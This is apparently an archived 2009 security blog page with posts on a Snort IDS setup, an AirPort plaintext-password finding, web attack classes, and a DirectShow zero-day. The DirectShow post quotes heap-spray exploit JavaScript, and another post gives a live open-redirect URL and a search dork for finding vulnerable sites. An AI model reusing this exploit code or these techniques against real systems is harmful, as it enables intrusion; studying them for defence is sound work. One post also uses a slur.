nodereality

node c0re

Don't blame bad parenting on the web

written by Ghirai, on Jul 21, 2009 5:51:00 AM.

Earlier this month, MySpace got sued by several parents, who claimed that MySpace is somehow responsible because their kids were sexually assaulted by people they met on MySpace.

There have been quite a few similar situations in the past; apparently, some totally retarded parents think that it's MySpace's or example.com's job to parent their kids.

By the same logic, you should sue some detergent company because your kid ate 2 kg of detergent and died. It's their job to parent your kids, right?

The fact that those kids got assaulted is regrettable, but the only ones to blame are the parents.

Obviously, social networks present a risk for minors, but so does, for example, crossing a highway, at night, while being 13 years old.

Sure, example.com needs to aid the authorities in bringing the perpetrators to justice by providing information, should something like this happen, but it can't do any real prevention. That's the parents' job, and always will be.

You can read more in this PDF, and in Reuters' coverage of the story.

Installing Snort IDS and BASE on FreeBSD 7

written by abstorted, on Jul 13, 2009 12:45:00 PM.

This is a tutorial based on my experience with installing Snort IDS with the BASE system to view, dissect and graph alerts. This is a very straightforward install thanks to FreeBSD's ports system. If you choose another operating system like Linux, note that you probably will have to install from source because the package management systems like aptitude are severely out of date.

Let's begin!

# Locate Snort in the FreeBSD ports tree and cd into that directory:
cd /usr/ports/security/snort
# Change to the root user and install
sudo make install clean

It will ask you a few questions in an ncurses interface; choose the database you will be using. I chose MySQL because it was already installed, but I recommend PostgreSQL for its speed and ease of use.

When it finishes compiling we need to install oinkmaster. Oinkmaster is a port that fetches the latest signatures from snort.org. Configuration instructions for it follow after the install.

# Locate oinkmaster and cd into its directory
cd /usr/ports/security/oinkmaster
# Change to root user and install
sudo make install clean

Now you need to go to snort.org and register in order to receive the latest snort definitions. You will receive a hash which you'll place in your configuration file. Save this hash. It's time to set up the configuration file for oinkmaster and then run it to receive over 500 MB of definitions.

# change the name of oinkmaster.conf.sample to oinkmaster.conf
mv /usr/local/etc/oinkmaster.conf.sample /usr/local/etc/oinkmaster.conf
# open this up with your favorite editor
ee /usr/local/etc/oinkmaster.conf

Inside this configuration file, look for the line "Example for Snort-Current".

In the url line below it, change the placeholder between the < and > symbols to the hash you saved earlier (replacing the < and > symbols as well).

The next part is where I ran into trouble. When we run oinkmaster like this:

oinkmaster -o /usr/local/etc/snort/rules

I realized that there was not enough space in my /tmp directory:

[root@mysystem ~]$ df
Filesystem  1K-blocks    Used     Avail Capacity  Mounted on
/dev/ad2s1a    507630  220226    246794    47%    /
devfs               1       1         0   100%    /dev
/dev/ad2s1e    507630     164    466856     0%    /tmp
/dev/ad2s1f 146367154 9481038 125176744     7%    /usr
/dev/ad2s1d   1998574 1489084    349606    81%    /var

So I changed the directory where oinkmaster saves the tar.gz to one on a larger partition, using the tmpdir option in oinkmaster.conf:

# in /usr/local/etc/oinkmaster.conf: change the directory if your /tmp partition is under 500 MB
tmpdir = /home/someuser/snort/

Now that oinkmaster has enough room to download and extract the tarball we can run our command again:

oinkmaster -o /usr/local/etc/snort/rules

Our rules are up to date; now we need to set up a database so that Snort can save alerts and BASE can display them on the web.

# login as root to MySQL, create a database and user for snort
mysql -u root -p
CREATE DATABASE `snort`;
GRANT ALL PRIVILEGES ON snort.* to 'snort'@'localhost' IDENTIFIED by 'somepasswordhere';

Now we set up our database with tables and the appropriate data, using a script that was included in the port.

# log in to MySQL as the snort user and load the create_mysql schema script into the database
mysql -u snort -p snort < /usr/local/share/examples/snort/create_mysql

There are a few more things to do to make snort work. We first have to edit the snort.conf so that it knows about our database. We also have to add snort to our startup options (rc.conf).

# open up snort.conf and configure some settings (make sure the db settings match the user and password you created above)
ee /usr/local/etc/snort/snort.conf
# uncomment the following lines (and configure them):
# config detection: search-method lowmem
# output alert_syslog: LOG_AUTH LOG_ALERT
# output database: log, mysql, user=snort password=mysnortpassword dbname=snort host=localhost
# (password= is the password you set in the GRANT statement above)

Also make sure to uncomment all the include $RULE_PATH lines, or, if you want, only the ones you wish to monitor; that will improve speed but reduce the number of signatures checked.

Enable snort in rc.conf:

sudo ee /etc/rc.conf    # and add snort_enable="YES"

Let's install BASE now (it needs the ADOdb port):

cd /usr/ports/databases/adodb; sudo make install clean
cd /usr/ports/security/base; sudo make install clean

Set up Apache to serve the directory BASE was installed in, and restart Apache.

# start snort
sudo /usr/local/etc/rc.d/snort start

Log in to your BASE site and follow the setup instructions; your IDS is now installed.

Using Snort with BASE:

(screenshot: snort1)

This is the BASE main screen on my server. It gives the user an easy-to-use interface to view the different alerts.

(screenshot: snort2)

I find it best to view the unique alerts on this main screen and check the details of those packet captures.

(screenshot: snort3)

Here is a display of the unique alerts. It shows the total number of times each specific alert was triggered. You can open up a specific incident and view the pcap file in many different formats.

(screenshot: snort4)

Here is a payload of the MSSQL Slammer worm. It is the most active alert on my server; however, it poses no threat to me because I do not run Windows.
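As an added example (not part of the original post), here is a small Python script that does what BASE's unique-alerts screen does, but over the syslog output configured above: it parses the one-line alert form Snort writes via output alert_syslog, groups hits by signature, and counts distinct source addresses. The alert line format is assumed from Snort 2.8-era syslog output; the sample log lines are constructed, with sid 2003 taken as the stock Slammer signature id and sid 1000001 as a made-up local rule.

```python
import re
from collections import Counter

# One-line alert form as written by "output alert_syslog" (format assumed from
# Snort 2.8-era output; ICMP alerts carry no port numbers, so ports are optional).
ALERT_RE = re.compile(
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+"
    r"(?:\[Classification:\s*(?P<classification>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<priority>\d+)\]:\s+"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?"
)

# Constructed sample syslog lines (not real traffic). The sshd line is noise the
# parser must skip. sid 2003 is assumed to be the stock Slammer rule the post
# mentions; sid 1000001 is a made-up local rule.
SAMPLE_LOG = """\
Jul 13 12:45:01 mysystem snort[1234]: [1:2003:8] MS-SQL Worm propagation attempt [Classification: Misc Attack] [Priority: 2]: {UDP} 198.51.100.7:1434 -> 192.0.2.10:1434
Jul 13 12:45:03 mysystem snort[1234]: [1:2003:8] MS-SQL Worm propagation attempt [Classification: Misc Attack] [Priority: 2]: {UDP} 203.0.113.9:1434 -> 192.0.2.10:1434
Jul 13 12:46:10 mysystem snort[1234]: [1:1000001:1] LOCAL ping sweep [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 203.0.113.9 -> 192.0.2.10
Jul 13 12:47:00 mysystem snort[1234]: [1:2003:8] MS-SQL Worm propagation attempt [Classification: Misc Attack] [Priority: 2]: {UDP} 198.51.100.7:1434 -> 192.0.2.10:1434
Jul 13 12:47:05 mysystem sshd[999]: Accepted publickey for someuser from 192.0.2.20 port 51515 ssh2
"""


def parse_alert(line):
    """Return a dict for one Snort syslog alert line, or None for any other line."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    a = m.groupdict()
    for k in ("gid", "sid", "rev", "priority"):
        a[k] = int(a[k])
    return a


def unique_alerts(lines):
    """Group alerts by signature, the way BASE's unique-alerts screen does:
    one row per (gid, sid, message) with the hit count and the number of
    distinct source addresses, most frequent first."""
    counts = Counter()
    sources = {}
    priority = {}
    for line in lines:
        a = parse_alert(line)
        if a is None:
            continue
        key = (a["gid"], a["sid"], a["msg"])
        counts[key] += 1
        sources.setdefault(key, set()).add(a["src"])
        priority[key] = a["priority"]
    return [
        {"gid": g, "sid": s, "msg": msg, "count": n,
         "unique_sources": len(sources[(g, s, msg)]),
         "priority": priority[(g, s, msg)]}
        for (g, s, msg), n in counts.most_common()
    ]


if __name__ == "__main__":
    # Run on the constructed sample; point it at /var/log/auth.log (or wherever
    # LOG_AUTH lands on your box) for real data.
    for row in unique_alerts(SAMPLE_LOG.splitlines()):
        print(f"{row['count']:4d}  [{row['gid']}:{row['sid']}]  {row['msg']}  "
              f"(sources: {row['unique_sources']}, priority {row['priority']})")
```

The unique-sources column is the quick sanity check the screenshots hint at: an alert with thousands of hits from one address is a noisy scanner, while the same count from many addresses is a worm.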

There are even graphing functions:

(screenshot: snort5)

It is useful to know what is going on in your network, and Snort is an excellent tool to assist with this. However, Snort IDS will not stop attacks; it only displays what has happened. There are other tools to actually stop attacks, like Snort-Inline (whose modes, such as PRM or packet replace mode, change the packet data so it becomes useless).

You need to supplement your server with PF (packet filtering) in order to maintain a good degree of security. You may notice that there have been no alerts for port scanning. My PF configuration stops this kind of activity completely.

Other tools to increase your awareness of an incident on FreeBSD include Tripwire, which shows what files were modified, created or deleted on your system. Some configuration changes also help, like putting your OpenSSH server on a higher port so bots do not brute-force it. With some scripts and a firewall (IPTables on Linux, or the PF setup above on FreeBSD) you can blacklist IPs that make repeated brute-force attempts against your server. You should also always use a remote logging system, because it is very easy for an attacker to clean the logs once they have root access to your server.
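The blacklisting script mentioned above, as an added Python example that is not from the original post: it reads sshd failure lines from syslog, flags sources that exceed a threshold within a sliding time window (so five failures spread over an hour are not treated like five in a minute), and emits the pfctl commands that would add them to a PF table. The sshd line format is assumed from stock OpenSSH logging, the sample lines are constructed, and the table name bruteforce assumes a matching "table <bruteforce> persist" entry plus a block rule in pf.conf.

```python
import re
from collections import defaultdict
from datetime import datetime

# Syslog line for a failed sshd login (format assumed from stock OpenSSH logging).
FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)

# Constructed sample log (not real traffic). 203.0.113.5 hammers the server within
# one minute; 198.51.100.8 also fails five times, but ten minutes apart; the last
# line is a successful key login that must be ignored.
SAMPLE_AUTH_LOG = """\
Jul 13 12:00:00 mysystem sshd[801]: Failed password for invalid user admin from 198.51.100.8 port 40001 ssh2
Jul 13 12:10:00 mysystem sshd[802]: Failed password for invalid user test from 198.51.100.8 port 40002 ssh2
Jul 13 12:20:00 mysystem sshd[803]: Failed password for root from 198.51.100.8 port 40003 ssh2
Jul 13 12:30:00 mysystem sshd[804]: Failed password for root from 198.51.100.8 port 40004 ssh2
Jul 13 12:40:00 mysystem sshd[805]: Failed password for invalid user oracle from 198.51.100.8 port 40005 ssh2
Jul 13 12:47:05 mysystem sshd[901]: Failed password for invalid user admin from 203.0.113.5 port 51001 ssh2
Jul 13 12:47:09 mysystem sshd[902]: Failed password for invalid user admin from 203.0.113.5 port 51002 ssh2
Jul 13 12:47:14 mysystem sshd[903]: Failed password for root from 203.0.113.5 port 51003 ssh2
Jul 13 12:47:20 mysystem sshd[904]: Failed password for root from 203.0.113.5 port 51004 ssh2
Jul 13 12:47:31 mysystem sshd[905]: Failed password for invalid user guest from 203.0.113.5 port 51005 ssh2
Jul 13 12:48:02 mysystem sshd[906]: Failed password for invalid user guest from 203.0.113.5 port 51006 ssh2
Jul 13 12:49:00 mysystem sshd[999]: Accepted publickey for someuser from 192.0.2.20 port 51515 ssh2
"""


def parse_failures(lines):
    """Return (timestamp, ip, user) for every failed-password line."""
    events = []
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            # syslog has no year; 1900 is fine for differences within one log
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("ip"), m.group("user")))
    return events


def brute_force_sources(lines, threshold=5, window_seconds=300):
    """Map ip -> largest number of failures seen inside any window_seconds span,
    for ips where that number reaches threshold."""
    by_ip = defaultdict(list)
    for ts, ip, _ in parse_failures(lines):
        by_ip[ip].append(ts)
    offenders = {}
    for ip, times in by_ip.items():
        times.sort()
        j = 0  # left edge of the sliding window
        for i in range(len(times)):
            while (times[i] - times[j]).total_seconds() > window_seconds:
                j += 1
            n = i - j + 1
            if n >= threshold:
                offenders[ip] = max(offenders.get(ip, 0), n)
    return offenders


def pf_table_commands(offenders, table="bruteforce"):
    """pfctl invocations that would add each offender to a PF table (assumes the
    table exists in pf.conf and a block rule references it). Printed, not run."""
    return [f"pfctl -t {table} -T add {ip}" for ip in sorted(offenders)]


if __name__ == "__main__":
    hits = brute_force_sources(SAMPLE_AUTH_LOG.splitlines())
    for cmd in pf_table_commands(hits):
        print(cmd)
```

Feed it the real auth log from cron (or pipe tail -f output through it) and pass the commands to sh only after you are happy with the threshold; with a persist table you can also expire entries periodically with pfctl -t bruteforce -T expire.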

Plain text from Apple

written by Alan, on Jul 11, 2009 2:37:00 AM.

This is something small I found by chance; it's not the most major of security holes, but hey, I get a plaintext password. You should never be able to get a password in plaintext... it just defeats the point, right?

Let me explain a little about how this happened. I already have a Time Capsule device from Apple, which is a network storage device that also provides routing, network address translation and wifi. However, it lacks the AirTunes option that the AirPort Express device offers.

AirTunes allows you to stream music over wireless to the speakers connected to the AirPort Express device. But because this device also has the other features of the Time Capsule, minus the network storage, I couldn't justify buying a new AirPort Express, so I got a used one from eBay.

All is well, and I get my package in the post a few days after buying. I plug it in and open the AirPort Utility to configure the device to my needs.

Problem! The device is asking for a password... Well, OK, I must be able to factory reset this unit, and a quick Google brings me to this support article. It tells me I should do a soft reset if I forget the password. This gives you 5 minutes to change any setting on the device without a password, including the password itself.

I do a soft reset and open the configuration on the device... something I notice is that the password field has some masked letters in it, but what appeals to me more is the option to save the password in my keychain. So, I check this option and change a different setting on the AirPort Express (e.g. the device name) so the save button will be enabled.

(screenshot: AirPort Utility)

After saving I check my keychain, and what a shock: the password of the old owner of this AirPort Express is there for me in plain text.

(screenshot: Keychain)

Directshow exploit

written by Ghirai, on Jul 9, 2009 2:37:00 AM.

As you probably know, it's a Windows 0day against msvidctl.dll. Some Chinese sites have been using drive-by attacks with it for the past 3 days or so.

Microsoft has an advisory, as well as a blog post.

The idea is that setting the killbit on the dll will prevent the attack (.reg file):

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}] 
"Compatibility Flags"=dword:00000400

You can find variations of the snippet all over the web, according to CSIS (who supposedly discovered the exploit):

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" + [SNIP]);
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

For those of you who want to do further testing, there is a metasploit module available, as well as a quick script to generate the gif file directly.

For reference, here are CVE and OSVDB links.

Evolution of Exploits

written by abstorted, on Jul 6, 2009 6:26:00 AM.

Years ago it was simple enough to scan a network, find vulnerable servers, go to web sites like packetstormsecurity.org to acquire remote exploits, and then launch them against the target. Times are changing, and attackers are going after web applications more frequently. SQL injections, XSS exploits and RFIs are somewhat the norm now and the easiest to exploit; these problems are becoming the easiest way into a system. There are countless web applications written by amateur coders, and even homemade ones, that have never been audited thoroughly. These applications pose various risks for the providers.

Looking through the archives of exploits available for a popular CMS (content management system) called Joomla, the total count of exploits for that web application is above 90. I usually see about 2 Joomla SQL injections (or blind SQL injections) per week. Surprising? It used to be, but you get used to it after a while. The problem seems to come down to coders not thinking about the security implications when they design and write programs.

Let's focus on three major problems in web application security. As mentioned before, these include SQL injections, XSS (cross site scripting), and RFI (remote file inclusions).

SQL injections exploit various database servers through input that the coder should have sanitized before it reaches the query. An attacker can acquire information from the database, or even add new information to it. An interesting example I've seen is code injected into the server's log files: when the administrator opens the log, the malicious code is executed.

XSS, or cross-site scripting, is really increasing in popularity, and many large 'secure' sites have been attacked with it. Usually a link that contains an embedded link to a malicious web page is constructed. When the user clicks on it, another web page is loaded through an iframe or other means. The attacker can then record the session using a JavaScript-to-PHP keylogger, or use a redirection to acquire an account username and password. Some companies are even so sure that their applications are secure that they offer money to hack them (http://www.itworld.com/security/68962/web-mail-company-pay-prize-after-ceo-hacked).

For a demonstration of XSS, look at this URL: http://www.eatsmart.org/external/default.asp?URL=http://www.amitbhawani.com/blog/Images/W/Website-Hacking-XSS-Report.gif

It contains default.asp?URL=. This input is not sanitized, and an attacker can put the address of a drive-by exploit generated by something like Active eXploit in that URL. For demonstration, the above URL is not malicious and only contains the URL of an image showing a graph of web exploits. These exploits, combined with the power of Google hacking, are done at random and on a mass scale. Try it: Google inurl:default.asp?URL= and see for yourself.

RFIs, or remote file inclusions, are another way to acquire and maintain access to a compromised host. These come in the form of exploiting a web application, for example a file upload mechanism. Once the flaw is found, the attacker uploads a PHP shell like r57 in order to have full control of the system as the web server's user (usually www-data or www). Often this is a stepping stone to running a remote connect-back C or Perl program, where the attacker listens on his local machine with something like Netcat and receives a shell shuffled back from the server. He or she then proceeds to further attacks like privilege escalation exploits and other misconfigured applications, ultimately gaining root or information.
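The three problems described above (unsanitized query input, an unchecked URL= redirect parameter, and an upload form that accepts a PHP shell) each come down to how the application treats attacker-controlled input. As an added example, not from the original post and written in Python rather than the PHP the post refers to, here is the vulnerable string-built query beside its parameterised form, an allow-list check for a redirect target, and an upload-name filter. The host list, the allowed extensions and the in-memory users table are constructed assumptions.

```python
import os
import re
import sqlite3
from urllib.parse import urlparse

# --- 1. SQL injection: string building versus a parameterised query ----------

def make_db():
    """In-memory table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def lookup_vulnerable(conn, name):
    """The input is pasted into the SQL text, so quotes in it change the query."""
    query = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, name):
    """The driver binds the value separately; it can never become SQL syntax."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?",
                        (name,)).fetchall()

# --- 2. Redirect parameter (the default.asp?URL= pattern): allow-list the target

ALLOWED_REDIRECT_HOSTS = {"www.example.com"}   # assumption: the site's own host names


def safe_redirect_target(url, default="/"):
    """Accept a same-site path or an absolute URL to an allowed host; otherwise
    fall back to default so the site never redirects a visitor off-site."""
    p = urlparse(url)
    if not p.scheme and not p.netloc and url.startswith("/") and not url.startswith("//"):
        return url                      # relative path on this site ("//host" is not)
    if p.scheme in ("http", "https") and p.hostname in ALLOWED_REDIRECT_HOSTS:
        return url                      # hostname, not netloc: "user@host" tricks fail
    return default

# --- 3. File upload: never let a script land in the web root ------------------

ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}   # assumption: image/PDF form
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def safe_upload_name(filename):
    """Return a cleaned file name, or None if the upload must be rejected."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_UPLOAD_EXT or not SAFE_STEM.match(stem):
        return None        # rejects shell.php, r57.php.gif (dot in stem), "a b.png", ...
    return stem + ext


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, probe))   # every row comes back
    print("safe:      ", lookup_safe(db, probe))         # no user has that name
    print(safe_redirect_target("http://attacker.example/"), safe_upload_name("r57.php.gif"))
```

The upload filter is only half the fix: store uploads outside the document root, or serve that directory with script execution turned off, so that even a file that slips past the name check is never run by the web server.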

If you follow the daily news or mailing lists such as Full Disclosure, you'll notice that the majority of these attacks are based on the above security issues. If you want to learn more about these attacks and try them yourself (in my opinion the only way to really understand them), then go to this site: http://www.hackthissite.org/ and play the game, where you will learn how to hack web applications legally. You'll learn an awful lot about how to write secure code for web applications and what mistakes to avoid.

For further reading, check out The Web Application Hacker's Handbook. It's a dense bible of web application attacks and of ways to secure your system against them.